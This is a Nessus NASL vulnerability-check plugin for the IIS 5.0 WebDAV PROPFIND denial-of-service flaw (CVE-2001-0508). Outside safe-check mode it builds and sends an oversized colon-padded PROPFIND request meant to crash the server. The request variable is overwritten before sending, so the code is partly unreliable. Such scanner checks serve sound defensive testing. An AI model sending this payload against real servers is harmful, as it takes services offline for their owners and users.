#
# This script is based on Georgi Guninski's perl script
# ported to NASL by John Lampe <j_lampe@bellsouth.net>
#
# See the Nessus Scripts License for details
#

if(description)
{
 script_id(10667);
 script_cve_id("CAN-2001-0508");
 script_bugtraq_id(2690);
 
 script_version ("$Revision: 1.13 $");

 name["english"] = "IIS 5.0 PROPFIND Vulnerability";
 script_name(english:name["english"]);

 desc["english"] = "
It was possible to disable the remote IIS server
by making a variation of a specially formed PROPFIND request.

Solution : disable the WebDAV extensions, as well as the PROPFIND command
See 
http://support.microsoft.com/support/kb/articles/Q241/5/20.ASP
See also: 
http://www.microsoft.com/technet/security/bulletin/MS01-016.asp

Risk factor : Serious";

 script_description(english:desc["english"]);

 summary["english"] = "Attempts to crash the Microsoft IIS server";
 script_summary(english:summary["english"]);
 script_category(ACT_MIXED_ATTACK); # mixed


 script_copyright(english:"This script is Copyright (C) 2001 John Lampe");
 family["english"] = "Denial of Service";
 family["francais"] = "Dni de service";
 script_family(english:family["english"], francais:family["francais"]);
 script_dependencie("find_service.nes", "http_version.nasl");
 script_require_ports("Services/www", 80);
 script_require_keys("www/iis");
 exit(0);
}

#
# The script code starts here
#

port = get_kb_item("Services/www");
if(!port)port = 80;



if(safe_checks())
{
  if(get_port_state(port))
  {
   soc = open_sock_tcp(port);
   req = string("PROPFIND / HTTP/1.0\r\n\r\n");
   send(socket:soc, data:req);
   r = recv(socket:soc, length:4096);
   
   if("411 Length Required" >< r)
   {
    if("IIS" >< r)
    {
    alrt = "
The PROPFIND method is enabled on the remote IIS server.
On unpatched versions of IIS this allows anyone to
remotely shut this server down.  Microsoft included this
patch in Win2k Service Pack 2.

*** Nessus reports this vulnerability using only
*** information that was gathered. Use caution
*** when testing without safe checks enabled.

Solution : disable the WebDAV extensions, as well as the PROPFIND
command See 
http://support.microsoft.com/support/kb/articles/Q241/5/20.ASP
also:
http://www.microsoft.com/technet/security/bulletin/MS01-016.asp
Risk factor : Serious";

     security_hole(port:port, data:alrt);
    }
   }
   
  }  
  exit(0);
}
mylen = 59060;
quote = raw_string(0x22);
xml = string ("<?xml version=",
      quote ,
      "1.0",
      quote,
      "?><a:propfind xmlns:a=",
      quote,
      "DAV:",
      quote,
      " xmlns:u=",
      quote,
      crap(length:mylen, data:":"),
      ":", 
      quote,
      ">",
      "<a:prop><a:displayname /><u:",
      "AAAA", 
      crap(length:mylen, data:":"),
      crap(length:64, data:"A"),
      " /></a:prop></a:propfind>\r\n\r\n");

l = strlen(xml);
req = string ("PROPFIND / HTTP/1.1\r\n", 
"Content-type: text/xml\r\n", 
"Host: ", get_host_name() , "\r\n", 
"Content-length: ", l, "\r\n\r\n", xml, "\r\n\r\n\r\n");


soc = open_sock_tcp(port);
if(!soc)exit(0);
else {
	req = http_get(item:"/", port:port);
	send(socket:soc, data:req);
	r = recv(socket:soc, length:4096);
	close(soc);
	if(!r)exit(0);
	}

soc2 = open_sock_tcp(port);
if(soc2)
{
 send(socket:soc2, data:req);
 r = recv(socket:soc2, length:4096);
 close(soc2);
}
else {
	exit(0);
     }

sleep(1);
soc3 = open_sock_tcp(port);
if(soc3)
{
req = http_get(item:"/", port:port);
send(socket:soc3, data:req);
r = recv(socket:soc3, length:4096);
close(soc3);
if(!r){
       security_hole(port);
     }
else {
	if("HTTP/1.1 500 Server Error" >< r)security_hole(port);
     }
}
else 
{
 security_hole(port);
}
